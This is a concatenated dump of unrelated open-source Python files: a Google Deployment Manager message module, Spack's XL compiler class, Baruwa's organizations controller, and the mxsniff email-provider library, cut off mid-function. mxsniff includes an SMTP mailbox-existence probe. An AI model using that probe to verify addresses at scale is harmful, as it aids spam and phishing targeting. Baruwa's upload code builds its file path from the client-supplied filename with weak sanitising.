config = _messages.MessageField('ConfigFile', 1)
imports = _messages.MessageField('ImportFile', 2, repeated=True)
class TemplateContents(_messages.Message):
"""Files that make up the template contents of a template type.
Fields:
imports: Import files referenced by the main template.
interpreter: Which interpreter (python or jinja) should be used during
expansion.
schema: The contents of the template schema.
template: The contents of the main template file.
"""
imports = _messages.MessageField('ImportFile', 1, repeated=True)
interpreter = _messages.StringField(2)
schema = _messages.StringField(3)
template = _messages.StringField(4)
class TestPermissionsRequest(_messages.Message):
"""A TestPermissionsRequest object.
Fields:
permissions: The set of permissions to check for the 'resource'.
Permissions with wildcards (such as '*' or 'storage.*') are not allowed.
"""
permissions = _messages.StringField(1, repeated=True)
class TestPermissionsResponse(_messages.Message):
"""A TestPermissionsResponse object.
Fields:
permissions: A subset of `TestPermissionsRequest.permissions` that the
caller is allowed.
"""
permissions = _messages.StringField(1, repeated=True)
class Type(_messages.Message):
"""A resource type supported by Deployment Manager.
Fields:
configurableService: Base Type (configurable service) that backs this
Type.
description: An optional textual description of the resource; provided by
the client when the resource is created.
id: [Output Only] Unique identifier for the resource; defined by the
server.
insertTime: [Output Only] Timestamp when the type was created, in RFC3339
text format.
labels: Map of labels; provided by the client when the resource is created
or updated. Specifically: Label keys must be between 1 and 63 characters
long and must conform to the following regular expression:
[a-z]([-a-z0-9]*[a-z0-9])? Label values must be between 0 and 63
characters long and must conform to the regular expression
([a-z]([-a-z0-9]*[a-z0-9])?)?
name: Name of the type.
operation: [Output Only] The Operation that most recently ran, or is
currently running, on this type.
selfLink: [Output Only] Self link for the type.
"""
configurableService = _messages.MessageField('ConfigurableService', 1)
description = _messages.StringField(2)
id = _messages.IntegerField(3, variant=_messages.Variant.UINT64)
insertTime = _messages.StringField(4)
labels = _messages.MessageField('TypeLabelEntry', 5, repeated=True)
name = _messages.StringField(6)
operation = _messages.MessageField('Operation', 7)
selfLink = _messages.StringField(8)
class TypeLabelEntry(_messages.Message):
"""A TypeLabelEntry object.
Fields:
key: A string attribute.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
class TypeProvider(_messages.Message):
"""A type provider that describes a service-backed Type.
Fields:
collectionOverrides: Allows resource handling overrides for specific
collections
credential: Credential used when interacting with this type.
description: An optional textual description of the resource; provided by
the client when the resource is created.
    descriptorUrl: Descriptor URL for this type provider.
id: [Output Only] Unique identifier for the resource; defined by the
server.
insertTime: [Output Only] Timestamp when the type provider was created, in
RFC3339 text format.
labels: Map of labels; provided by the client when the resource is created
or updated. Specifically: Label keys must be between 1 and 63 characters
long and must conform to the following regular expression:
[a-z]([-a-z0-9]*[a-z0-9])? Label values must be between 0 and 63
characters long and must conform to the regular expression
([a-z]([-a-z0-9]*[a-z0-9])?)?
name: Name of the type provider.
operation: [Output Only] The Operation that most recently ran, or is
currently running, on this type provider.
options: Options to apply when handling any resources in this service.
selfLink: [Output Only] Self link for the type provider.
"""
collectionOverrides = _messages.MessageField('CollectionOverride', 1, repeated=True)
credential = _messages.MessageField('Credential', 2)
description = _messages.StringField(3)
descriptorUrl = _messages.StringField(4)
id = _messages.IntegerField(5, variant=_messages.Variant.UINT64)
insertTime = _messages.StringField(6)
labels = _messages.MessageField('TypeProviderLabelEntry', 7, repeated=True)
name = _messages.StringField(8)
operation = _messages.MessageField('Operation', 9)
options = _messages.MessageField('Options', 10)
selfLink = _messages.StringField(11)
class TypeProviderLabelEntry(_messages.Message):
"""A TypeProviderLabelEntry object.
Fields:
key: A string attribute.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
class TypeProvidersListResponse(_messages.Message):
"""A response that returns all Type Providers supported by Deployment
Manager
Fields:
nextPageToken: A token used to continue a truncated list request.
typeProviders: [Output Only] A list of resource type providers supported
by Deployment Manager.
"""
nextPageToken = _messages.StringField(1)
typeProviders = _messages.MessageField('TypeProvider', 2, repeated=True)
class TypesListResponse(_messages.Message):
"""A response that returns all Types supported by Deployment Manager
Fields:
nextPageToken: A token used to continue a truncated list request.
types: [Output Only] A list of resource types supported by Deployment
Manager.
"""
nextPageToken = _messages.StringField(1)
types = _messages.MessageField('Type', 2, repeated=True)
class ValidationOptions(_messages.Message):
"""Options for how to validate and process properties on a resource.
Fields:
schemaValidation: Customize how deployment manager will validate the
resource against schema errors.
undeclaredProperties: Specify what to do with extra properties when
executing a request.
"""
schemaValidation = _messages.StringField(1)
undeclaredProperties = _messages.StringField(2)
| mit | -3,509,249,219,554,926,600 | 41.094975 | 100 | 0.735296 | false |
LLNL/spack | lib/spack/spack/compilers/xl.py | 3 | 4386 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.compiler import Compiler, UnsupportedCompilerFlag
from spack.version import ver
class Xl(Compiler):
# Subclasses use possible names of C compiler
cc_names = ['xlc']
# Subclasses use possible names of C++ compiler
cxx_names = ['xlC', 'xlc++']
# Subclasses use possible names of Fortran 77 compiler
f77_names = ['xlf']
# Subclasses use possible names of Fortran 90 compiler
fc_names = ['xlf90', 'xlf95', 'xlf2003', 'xlf2008']
# Named wrapper links within build_env_path
link_paths = {'cc': 'xl/xlc',
'cxx': 'xl/xlc++',
'f77': 'xl/xlf',
'fc': 'xl/xlf90'}
version_argument = '-qversion'
version_regex = r'([0-9]?[0-9]\.[0-9])'
@property
def verbose_flag(self):
return "-V"
@property
def debug_flags(self):
return ['-g', '-g0', '-g1', '-g2', '-g8', '-g9']
@property
def opt_flags(self):
return ['-O', '-O0', '-O1', '-O2', '-O3', '-O4', '-O5', '-Ofast']
@property
def openmp_flag(self):
return "-qsmp=omp"
@property
def cxx11_flag(self):
if self.version < ver('13.1'):
raise UnsupportedCompilerFlag(self,
"the C++11 standard",
"cxx11_flag",
"< 13.1")
else:
return "-qlanglvl=extended0x"
@property
def c99_flag(self):
if self.version >= ver('13.1.1'):
return '-std=gnu99'
if self.version >= ver('10.1'):
return '-qlanglvl=extc99'
raise UnsupportedCompilerFlag(self,
'the C99 standard',
'c99_flag',
'< 10.1')
@property
def c11_flag(self):
if self.version >= ver('13.1.2'):
return '-std=gnu11'
if self.version >= ver('12.1'):
return '-qlanglvl=extc1x'
raise UnsupportedCompilerFlag(self,
'the C11 standard',
'c11_flag',
'< 12.1')
@property
def cc_pic_flag(self):
return "-qpic"
@property
def cxx_pic_flag(self):
return "-qpic"
@property
def f77_pic_flag(self):
return "-qpic"
@property
def fc_pic_flag(self):
return "-qpic"
@property
def fflags(self):
# The -qzerosize flag is effective only for the Fortran 77
# compilers and allows the use of zero size objects.
        # For Fortran 90 and beyond, it is set by default and has no impact.
# Its use has no negative side effects.
return "-qzerosize"
@classmethod
def fc_version(cls, fc):
# The fortran and C/C++ versions of the XL compiler are always
# two units apart. By this we mean that the fortran release that
        # goes with XL C/C++ 11.1 is 13.1. Having such a difference in
        # version number confuses Spack quite a lot. Most notably,
        # if you keep the versions as-is, the default xl compiler will
        # only have Fortran and no C/C++. So we associate the Fortran
        # compiler with the version associated to the C/C++ compiler.
        # One last stumble: version numbers over 10 have at least a .1,
        # those under 10 a .0. There is no xlf 9.x or under currently
        # available. BG/P and BG/L can have such a compiler mix, and
        # possibly older versions of AIX and Linux on Power.
fortran_version = cls.default_version(fc)
if fortran_version >= 16:
# Starting with version 16.1, the XL C and Fortran compilers
# have the same version. So no need to downgrade the Fortran
# compiler version to match that of the C compiler version.
return str(fortran_version)
c_version = float(fortran_version) - 2
if c_version < 10:
c_version = c_version - 0.1
return str(c_version)
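    # Illustrative mappings implied by the logic above (assuming
    # default_version() reports the raw xlf version): xlf 16.1 and later map to
    # the same version; xlf 15.1 maps to 13.1 (two units apart, still >= 10);
    # and a Fortran version whose C/C++ counterpart falls below 10 also drops
    # the trailing .1 (e.g. xlf 11.1 corresponds to xlC 9.0).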
@classmethod
def f77_version(cls, f77):
return cls.fc_version(f77)
| lgpl-2.1 | -4,210,612,487,192,557,600 | 32.738462 | 77 | 0.546968 | false |
TetraAsh/baruwa2 | baruwa/controllers/organizations.py | 1 | 17571 | # -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4
# Baruwa - Web 2.0 MailScanner front-end.
# Copyright (C) 2010-2012 Andrew Colin Kissa <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"Organizations controller"
import os
import shutil
import socket
import struct
import logging
from urlparse import urlparse
from pylons import request, response, session, tmpl_context as c, url, config
from pylons.controllers.util import abort, redirect
from pylons.i18n.translation import _
from webhelpers import paginate
from celery.result import AsyncResult
from sqlalchemy.orm import joinedload
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.exc import NoResultFound
from repoze.what.predicates import All, not_anonymous
from sphinxapi import SphinxClient, SPH_MATCH_EXTENDED2
from repoze.what.plugins.pylonshq import ControllerProtector
from baruwa.lib.dates import now
from baruwa.lib.base import BaseController, render
from baruwa.lib.helpers import flash, flash_info, flash_alert
from baruwa.lib.query import clean_sphinx_q, restore_sphinx_q
from baruwa.lib.misc import check_num_param
from baruwa.lib.misc import iscsv, convert_org_to_json
from baruwa.model.meta import Session
from baruwa.lib.audit import audit_log
from baruwa.lib.auth.predicates import OnlySuperUsers
from baruwa.tasks.settings import update_serial
from baruwa.model.accounts import Group, User, Relay
from baruwa.model.domains import Domain
from baruwa.forms.organizations import OrgForm, RelayForm, RelayEditForm
from baruwa.forms.organizations import DelOrgForm
from baruwa.forms.organizations import ImportCSVForm
from baruwa.tasks import importdomains
from baruwa.lib.audit.msgs.organizations import *
log = logging.getLogger(__name__)
@ControllerProtector(All(not_anonymous(), OnlySuperUsers()))
class OrganizationsController(BaseController):
def __before__(self):
"set context"
BaseController.__before__(self)
if self.identity:
c.user = self.identity['user']
else:
c.user = None
c.selectedtab = 'organizations'
def _get_org(self, orgid):
"Get organization"
try:
org = Session.query(Group).options(
joinedload('domains')).get(orgid)
except NoResultFound:
org = None
return org
def _get_setting(self, settingid):
"Get relay settings"
try:
setting = Session.query(Relay).options(
joinedload('org')).get(settingid)
except NoResultFound:
setting = None
return setting
def index(self, page=1, format=None):
"index page"
total_found = 0
search_time = 0
num_items = session.get('organizations_num_items', 10)
q = request.GET.get('q', None)
kwds = {}
if q:
kwds['presliced_list'] = True
conn = SphinxClient()
conn.SetMatchMode(SPH_MATCH_EXTENDED2)
if page == 1:
conn.SetLimits(0, num_items, 500)
else:
page = int(page)
offset = (page - 1) * num_items
conn.SetLimits(offset, num_items, 500)
q = clean_sphinx_q(q)
try:
results = conn.Query(q, 'organizations, organizations_rt')
except (socket.timeout, struct.error):
redirect(request.path_qs)
q = restore_sphinx_q(q)
if results and results['matches']:
ids = [hit['id'] for hit in results['matches']]
orgs = Session.query(Group)\
.filter(Group.id.in_(ids))\
.all()
total_found = results['total_found']
search_time = results['time']
orgcount = total_found
else:
orgs = []
ocount = 0
orgcount = 0
else:
orgs = Session.query(Group)
ocount = Session.query(Group.id)
        if 'orgcount' not in locals():
orgcount = ocount.count()
items = paginate.Page(orgs, page=int(page),
items_per_page=num_items,
item_count=orgcount,
**kwds)
if format == 'json':
response.headers['Content-Type'] = 'application/json'
data = convert_org_to_json(items)
return data
c.page = items
c.q = q
c.total_found = total_found
c.search_time = search_time
return render('/organizations/index.html')
def detail(self, orgid):
"Organization details"
org = self._get_org(orgid)
if not org:
abort(404)
c.org = org
return render('/organizations/detail.html')
def new(self):
"Add an organization"
c.form = OrgForm(request.POST, csrf_context=session)
c.form.domains.query = Session.query(Domain)
c.form.admins.query = Session.query(User).filter(
User.account_type == 2)
if request.POST and c.form.validate():
try:
org = Group()
org.name = c.form.name.data
org.domains = c.form.domains.data
Session.add(org)
Session.commit()
info = ADDORG_MSG % dict(o=org.name)
audit_log(c.user.username,
3, unicode(info), request.host,
request.remote_addr, now())
flash(_('The organization has been created'))
redirect(url(controller='organizations'))
except IntegrityError:
Session.rollback()
flash_alert(_('The organization already exists'))
return render('/organizations/add.html')
def edit(self, orgid):
"Edit an organization"
org = self._get_org(orgid)
if not org:
abort(404)
c.form = OrgForm(request.POST, org, csrf_context=session)
c.form.domains.query = Session.query(Domain)
c.form.admins.query = Session.query(User).filter(
User.account_type == 2)
c.id = org.id
if request.POST and c.form.validate():
updated = False
for field in c.form:
if (field.name != 'csrf_token' and
field.data != getattr(org, field.name)):
setattr(org, field.name, field.data)
updated = True
if updated:
try:
Session.add(org)
Session.commit()
info = UPDATEORG_MSG % dict(o=org.name)
audit_log(c.user.username,
2, unicode(info), request.host,
request.remote_addr, now())
flash(_('The organization has been updated'))
except IntegrityError:
Session.rollback()
flash(_('The organization could not be updated'))
else:
                flash_info(_('No changes made, organization not updated'))
redirect(url(controller='organizations'))
return render('/organizations/edit.html')
def delete(self, orgid):
"Delete an organization"
org = self._get_org(orgid)
if not org:
abort(404)
c.form = DelOrgForm(request.POST, org, csrf_context=session)
c.form.domains.query = Session.query(Domain)
c.form.admins.query = Session.query(User).filter(
User.account_type == 2)
c.id = org.id
if request.POST and c.form.validate():
org_name = org.name
if c.form.delete_domains.data:
for domain in org.domains:
Session.delete(domain)
Session.delete(org)
Session.commit()
info = DELETEORG_MSG % dict(o=org_name)
audit_log(c.user.username,
4, unicode(info), request.host,
request.remote_addr, now())
flash(_('The organization has been deleted'))
redirect(url(controller='organizations'))
else:
            flash(_('The organization: %(s)s will be deleted,'
                    ' this action is not reversible') % dict(s=org.name))
return render('/organizations/delete.html')
def add_relay(self, orgid):
"Add a mail relay"
org = self._get_org(orgid)
if not org:
abort(404)
c.form = RelayForm(request.POST, csrf_context=session)
if request.POST and c.form.validate():
try:
outbound = Relay()
outbound.address = c.form.address.data
outbound.username = c.form.username.data
outbound.enabled = c.form.enabled.data
outbound.description = c.form.description.data
outbound.org = org
if c.form.password1.data:
outbound.set_password(c.form.password1.data)
Session.add(outbound)
Session.commit()
relay_name = c.form.address.data or c.form.username.data
info = ADDRELAY_MSG % dict(r=relay_name)
audit_log(c.user.username,
3, unicode(info), request.host,
request.remote_addr, now())
flash(_('The outbound settings have been created'))
except IntegrityError:
Session.rollback()
                flash(_('The outbound settings could not be created, try again'))
redirect(url('org-detail', orgid=orgid))
c.orgid = org.id
c.orgname = org.name
return render('/organizations/addrelay.html')
def edit_relay(self, settingid):
"Edit a mail relay"
relay = self._get_setting(settingid)
if not relay:
abort(404)
c.form = RelayEditForm(request.POST, relay, csrf_context=session)
c.relayname = relay.address or relay.username
c.relayid = relay.id
c.orgid = relay.org_id
if request.POST and c.form.validate():
updated = False
for field in c.form:
if field.name == 'csrf_token':
continue
if (not field.name in ['password1', 'password2'] and
field.data != getattr(relay, field.name)):
setattr(relay, field.name, field.data)
updated = True
if field.name == 'password1' and field.data != '':
relay.set_password(field.data)
updated = True
if updated:
try:
Session.add(relay)
Session.commit()
info = UPDATERELAY_MSG % dict(r=c.relayname)
audit_log(c.user.username,
2, unicode(info), request.host,
request.remote_addr, now())
flash(_('The outbound settings have been updated'))
except IntegrityError:
Session.rollback()
flash(_('The outbound settings could not be updated'))
else:
                flash(_('No changes made, the outbound settings were not updated'))
redirect(url('org-detail', orgid=relay.org_id))
return render('/organizations/editrelay.html')
def delete_relay(self, settingid):
"Delete a mail relay"
relay = self._get_setting(settingid)
if not relay:
abort(404)
c.form = RelayForm(request.POST, relay, csrf_context=session)
c.relayname = relay.address or relay.username
c.relayid = relay.id
c.orgid = relay.org_id
if request.POST and c.form.validate():
orgid = relay.org_id
try:
Session.delete(relay)
Session.commit()
info = DELETERELAY_MSG % dict(r=c.relayname)
audit_log(c.user.username,
4, unicode(info), request.host,
request.remote_addr, now())
flash(_('The outbound settings have been deleted'))
except:
flash(_('The outbound settings could not be deleted'))
redirect(url('org-detail', orgid=orgid))
return render('/organizations/deleterelay.html')
def import_domains(self, orgid):
"import domains from csv file"
org = self._get_org(orgid)
if not org:
abort(404)
c.form = ImportCSVForm(request.POST, csrf_context=session)
if request.POST and c.form.validate():
basedir = config['pylons.cache_dir']
csvdata = request.POST['csvfile']
if hasattr(csvdata, 'filename'):
dstfile = os.path.join(basedir, 'uploads',
csvdata.filename.lstrip(os.sep))
if not os.path.exists(dstfile) and iscsv(csvdata.file):
csvfile = open(dstfile, 'w')
shutil.copyfileobj(csvdata.file, csvfile)
csvdata.file.close()
csvfile.close()
task = importdomains.apply_async(args=[orgid,
dstfile, c.form.skipfirst.data])
if not 'taskids' in session:
session['taskids'] = []
session['taskids'].append(task.task_id)
session['dimport-counter'] = 1
session['dimport-file'] = dstfile
session.save()
                    flash(_('File uploaded and is being processed; this page'
                        ' will automatically refresh to show the status'))
redirect(url('orgs-import-status', taskid=task.task_id))
else:
filename = csvdata.filename.lstrip(os.sep)
if not iscsv(csvdata.file):
flash_alert(_('The file: %s is not a CSV file') %
filename)
else:
flash_alert(_('The file: %s already exists '
'and is being processed.') % filename)
csvdata.file.close()
else:
                flash_alert(_('No CSV file was uploaded, try again'))
c.org = org
return render('/organizations/importdomains.html')
def import_status(self, taskid):
"import domains status"
result = AsyncResult(taskid)
if result is None or taskid not in session['taskids']:
flash(_('The task status requested has expired or does not exist'))
redirect(url(controller='organizations', action='index'))
if result.ready():
finished = True
flash.pop_messages()
if isinstance(result.result, Exception):
if c.user.is_superadmin:
                    flash_alert(_('Error occurred in processing %s') %
result.result)
else:
                    flash_alert(_('Backend error occurred during processing.'))
redirect(url(controller='organizations'))
update_serial.delay()
info = IMPORTORG_MSG % dict(o='-')
audit_log(c.user.username,
3, unicode(info), request.host,
request.remote_addr, now())
else:
session['dimport-counter'] += 1
session.save()
if (session['dimport-counter'] >= 10 and
result.state in ['PENDING', 'RETRY', 'FAILURE']):
result.revoke()
try:
os.unlink(session['dimport-file'])
except OSError:
pass
del session['dimport-file']
del session['dimport-counter']
session.save()
flash_alert(_('The import could not be processed,'
' try again later'))
redirect(url(controller='organizations'))
finished = False
c.finished = finished
c.results = result.result
c.success = result.successful()
return render('/organizations/importstatus.html')
def setnum(self, format=None):
"Set num of organizations returned"
num = check_num_param(request)
if num and num in [10, 20, 50, 100]:
session['organizations_num_items'] = num
session.save()
nextpage = request.headers.get('Referer', '/')
if '://' in nextpage:
from_url = urlparse(nextpage)
nextpage = from_url[2]
redirect(nextpage)
| gpl-3.0 | -7,609,831,463,490,971,000 | 39.025057 | 79 | 0.544818 | false |
jace/mxsniff | mxsniff/__init__.py | 1 | 19707 | # -*- coding: utf-8 -*-
"""
MX Sniff identifies common email service providers from an address or domain.
"""
from __future__ import absolute_import, print_function
from six import string_types, text_type
from six.moves.urllib.parse import urlparse
from collections import namedtuple
from email.utils import parseaddr
from functools import partial
import smtplib
import socket
import sys
from pyisemail import is_email
from tldextract import TLDExtract
import dns.resolver
from ._version import __version__, __version_info__ # NOQA: F401
from .providers import providers as all_providers
from .providers import public_domains
__all__ = ['MXLookupException', 'get_domain', 'mxsniff', 'mxbulksniff']
_value = object() # Used in WildcardDomainDict as a placeholder
tldextract = TLDExtract(suffix_list_urls=None) # Don't fetch TLDs during a sniff
ResultCodeMessage = namedtuple('ResultCodeMessage', ['result', 'code', 'message'])
class WildcardDomainDict(object):
"""
Like a dict, but with custom __getitem__ and __setitem__ to make a nested dictionary
with wildcard support for domain name mappings.
>>> d = WildcardDomainDict()
>>> d
WildcardDomainDict({})
>>> d['*.example.com'] = 'example-wildcard'
>>> d['*.wildcard.example.com.'] = 'example-subdotted'
>>> d['example.com'] = 'example'
>>> d['www.example.com'] = 'example-www'
>>> d['example.com']
'example'
>>> d['www.example.com']
'example-www'
>>> d['wildcard.example.com']
'example-wildcard'
>>> d['sub.wildcard.example.com']
'example-subdotted'
>>> d['example.wildcard.com']
Traceback (most recent call last):
...
KeyError: 'example.wildcard.com'
"""
def __init__(self, *args, **kwargs):
self.tree = dict(*args, **kwargs)
def __repr__(self):
return self.__class__.__name__ + '(' + repr(self.tree) + ')'
@staticmethod
def _makeparts(key):
parts = key.lower().split('.')
while '' in parts:
parts.remove('') # Handle trailing dot
return parts[::-1]
def __setitem__(self, key, value):
parts = self._makeparts(key)
tree = self.tree
for item in parts:
if item not in tree:
tree[item] = {}
tree = tree[item]
tree[_value] = value
def __getitem__(self, key):
parts = self._makeparts(key)
length = len(parts)
tree = self.tree
for counter, item in enumerate(parts):
last = counter == length - 1
if item in tree and (not last or last and _value in tree[item]):
tree = tree[item]
elif '*' in tree:
tree = tree['*']
else:
raise KeyError(key)
if _value in tree:
return tree[_value]
raise KeyError(key)
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return default
provider_mx = WildcardDomainDict()
provider_domains = {}
def __populate_dicts(pmx, pd):
for name, data in all_providers.items():
for domain in data['mx']:
pmx[domain] = name
if 'domains' in data:
for domain in data['domains']:
pd[domain] = name
__populate_dicts(provider_mx, provider_domains)
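# Illustrative sketch (hypothetical provider entry, not necessarily the real
# database contents): given {'example-mail': {'mx': ['*.mx.example.net'],
# 'domains': ['example.org']}}, the population above would make both
# provider_mx.get('in1.mx.example.net') and provider_domains.get('example.org')
# return 'example-mail'.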
class MXLookupException(Exception):
pass
def canonical_email(
email, lowercase=False, strip_periods=False, substitute_domains=None
):
"""
Return a canonical representation of an email address to facilitate string
comparison::
>>> canonical_email('Example <[email protected]>')
'[email protected]'
>>> canonical_email('[email protected]', lowercase=True, strip_periods=True)
'[email protected]'
"""
if substitute_domains is None:
substitute_domains = {}
# Example <[email protected]> --> [email protected]
addr = parseaddr(email)[1]
if not is_email(addr):
return
# [email protected] --> example+extra, Example.com
mailbox, domain = addr.split('@', 1)
# example+extra --> example
if '+' in mailbox:
mailbox = mailbox[: mailbox.find('+')]
if strip_periods and '.' in mailbox:
mailbox = mailbox.replace('.', '')
if lowercase:
mailbox = mailbox.lower()
# Example.com --> example.com
domain = domain.lower()
# googlemail.com --> gmail.com
if domain in substitute_domains:
domain = substitute_domains[domain]
# example, example.com --> [email protected]
return '%s@%s' % (mailbox, domain)
def get_domain(email_or_domain):
"""
Extract domain name from an email address, URL or (raw) domain name.
>>> get_domain('[email protected]')
'example.com'
>>> get_domain('http://www.example.com')
'example.com'
>>> get_domain('example.com')
'example.com'
"""
if '@' in email_or_domain:
# Appears to be an email address.
addr = parseaddr(email_or_domain)[1]
domain = addr.split('@', 1)[-1]
elif '//' in email_or_domain:
domain = tldextract(
urlparse(email_or_domain).netloc.split(':')[0]
).registered_domain
else:
domain = email_or_domain.strip()
return domain.lower()
def provider_info(provider):
"""
Return a copy of the provider dict with only public fields
"""
if provider in all_providers:
return {
'name': provider,
'title': all_providers[provider].get('title'),
'note': all_providers[provider].get('note'),
'url': all_providers[provider].get('url'),
'public': all_providers[provider].get('public', False),
}
def mxsniff(
email_or_domain,
ignore_errors=False,
cache=None,
timeout=30,
use_static_domains=True,
):
"""
Lookup MX records and identify the email service provider(s).
Accepts an email address, URL or domain name, and looks up an internal list of
well known providers.
:param str email_or_domain: Email, domain or URL to lookup
:param bool ignore_errors: Fail silently if there's a DNS lookup error
:param dict cache: Cache with a dictionary interface to avoid redundant lookups
:param int timeout: Timeout in seconds
:param bool use_static_domains: Speed up lookups by using the static domain list in
the provider database
:return: Matching domain, MX servers, and identified service provider(s)
:raises MXLookupException: If a DNS lookup error happens and ``ignore_errors`` is
False
>>> mxsniff('example.com')['match']
['nomx']
>>> mxsniff('__invalid_domain_name__.com')['match']
['nomx']
>>> mxsniff('[email protected]')['match']
['google-gmail']
>>> sorted(mxsniff('https://google.com/').keys())
['canonical', 'domain', 'match', 'mx', 'providers', 'public', 'query']
"""
domain = get_domain(email_or_domain)
if cache is not None and domain in cache:
result = dict(cache[domain])
result['query'] = email_or_domain
return result
#: Providers that matched
matches = []
#: Info on matching providers (title, note, url, public)
rproviders = []
#: Top-level of MX domain (used to detect self-hosted email)
tld = []
#: Default return value for MX in case an error occurs and is ignored
mx_answers = []
if use_static_domains and domain in provider_domains:
matches.append(provider_domains[domain])
rproviders.append(provider_info(provider_domains[domain]))
else:
try:
# Use a DNS resolver with custom timeout
resolver = dns.resolver.Resolver()
resolver.timeout = timeout
resolver.lifetime = timeout
# Get answers, sorted by MX preference
mx_answers = sorted(
(rdata.preference, rdata.exchange.to_text(omit_final_dot=True).lower())
for rdata in resolver.query(domain, 'MX')
)
for _preference, exchange in mx_answers:
# Extract the top-level domain for testing for self-hosted email later
rdomain = tldextract(exchange).registered_domain
if rdomain not in tld:
tld.append(rdomain)
# Check if the provider is known from the MX record
provider = provider_mx.get(exchange)
if provider and provider not in matches:
matches.append(provider)
rproviders.append(provider_info(provider))
except (
dns.resolver.NoAnswer,
dns.resolver.NXDOMAIN,
dns.resolver.NoNameservers,
):
pass
except dns.exception.DNSException as e:
if ignore_errors:
pass
else:
raise MXLookupException(e, domain)
if not matches:
# Check for self-hosted email servers; identify them with the label 'self'
if tldextract(domain).registered_domain in tld:
matches.append('self')
if not matches:
if mx_answers:
matches.append('unknown') # We don't know this one's provider
else:
matches.append('nomx') # This domain has no mail servers
if matches:
canonical = canonical_email(
email_or_domain,
**all_providers.get(matches[0], {}).get('canonical_flags', {})
)
else:
canonical = canonical_email(email_or_domain)
result = {
'query': email_or_domain,
'domain': domain,
'match': matches,
'mx': mx_answers,
'providers': rproviders,
'public': domain in public_domains or any(p['public'] for p in rproviders),
'canonical': canonical,
}
if cache is not None:
cache[domain] = result
return result
def mxprobe(email, mx, your_email, hostname=None, timeout=30):
"""
Probe an email address at an MX server
:param str email: Email address to be probed
:param mx: MX server(s) to do the test at; will be tried in order until one is
available
:param your_email: Your email address, to perform the probe
:param hostname: Optional hostname to perform the probe with
:return: :attr:`ResultCodeMessage`, a 3-tuple of result, SMTP code and explanatory
message
Possible results:
* invalid: This is not an email address
* error: The MX servers could not be probed
* fail: The email address doesn't appear to exist, but further investigation is
necessary
* soft-fail: The email address is currently not accepting email
* hard-fail: The email address does not exist
* pass: The email address appears to exist
* pass-unverified: Mail server is accepting email but can't verify existence
>>> mxprobe('[email protected]', 'gmail-smtp-in.l.google.com', '[email protected]')[0]
'pass'
>>> mxprobe('[email protected]', 'gmail-smtp-in.l.google.com', '[email protected]')[0]
'hard-fail'
>>> mxprobe('[email protected]', [], '[email protected]', timeout=5)[0]
'error'
>>> mxprobe('example.com', [], '[email protected]').result
'invalid'
"""
if not hostname:
hostname = 'probe.' + your_email.split('@', 1)[-1].strip()
email = parseaddr(email)[1]
if not is_email(email):
return ResultCodeMessage('invalid', None, None)
if not mx:
mx = [email.split('@', 1)[-1].strip()]
if isinstance(mx, string_types):
mx = [mx]
error_code = None
error_msg = None
for mxserver in mx:
probe_result = None
try:
smtp = smtplib.SMTP(mxserver, 25, hostname, timeout)
smtp.ehlo_or_helo_if_needed()
code, msg = smtp.mail(your_email)
msg = text_type(msg, 'utf-8')
if code != 250:
error_code = code
error_msg = msg
continue
# Supply the email address as a recipient and see how the server responds
code, msg = smtp.rcpt(email)
msg = text_type(msg, 'utf-8')
# List of codes from
# http://support.mailhostbox.com/email-administrators-guide-error-codes/
# 250 – Requested mail action completed and OK
if code == 250:
probe_result = ResultCodeMessage('pass', code, msg)
# 251 – Not Local User, forward email to forward path
# 252 – Cannot Verify user, will attempt delivery later
# 253 – Pending messages for node started
elif code in (251, 252, 253):
probe_result = ResultCodeMessage('pass-unverified', code, msg)
elif code in (
450, # Requested mail action not taken: mailbox unavailable. Request
# refused
451, # Requested action aborted: local error in processing. Request is
# unable to be processed, try again
452, # Requested action not taken: insufficient system storage
510, # Check the recipient address
512, # Domain can not be found. Unknown host.
515, # Destination mailbox address invalid
521, # Domain does not accept mail
522, # Recipient has exceeded mailbox limit
531, # Mail system Full
533, # Remote server has insufficient disk space to hold email
540, # Email address has no DNS Server
550, # Requested action not taken: mailbox unavailable
551, # User not local; please try forward path
552, # Requested mail action aborted: exceeded storage allocation
553, # Requested action not taken: mailbox name not allowed
):
# Some servers return ESMTP codes prefixed with #, others don't
if msg.startswith(('4.', '#4.')):
r = 'soft-fail'
elif msg.startswith(('5.', '#5.')):
r = 'hard-fail'
else:
r = 'fail'
probe_result = ResultCodeMessage(r, code, msg)
else: # Unknown code
error_code = code
error_msg = msg
except smtplib.SMTPResponseException as e:
error_code = e.smtp_code
error_msg = e.smtp_error
except (smtplib.SMTPException, socket.error) as e:
error_code = None
error_msg = text_type(e)
continue
# Probe complete. Quit the connection, ignoring errors
try:
smtp.rset()
smtp.quit()
except smtplib.SMTPException: # pragma: no cover
pass
# Did we get a result? Return it
if probe_result is not None:
return probe_result
# If no result, continue to the next MX server
# We couldn't talk to any MX server
return ResultCodeMessage('error', error_code, error_msg)
def mxbulksniff(items, ignore_errors=True):
"""
Identify the email service provider of a large set of domains or emails, caching to
    avoid repeat queries. Returns a generator that yields one item at a time.
>>> [(i['query'], i['match']) for i in mxbulksniff(
... ['example.com', 'google.com', 'http://www.google.com', 'example.com'])]
[('example.com', ['nomx']), ('google.com', ['google-apps']), ('http://www.google.com', ['google-apps']), ('example.com', ['nomx'])]
"""
cache = {}
for i in items:
yield mxsniff(i, ignore_errors, cache)
def mxsniff_and_probe(email, probe_email, timeout=30, **kwargs):
"""
Combine :func:`mxsniff` and :func:`mxprobe` into a single result
"""
result = mxsniff(email, timeout=timeout, **kwargs)
if probe_email:
result['probe'] = mxprobe(
email, [mx[1] for mx in result['mx']], probe_email, timeout=timeout
)
return result
def main_internal(args, name='mxsniff'):
"""
Console script
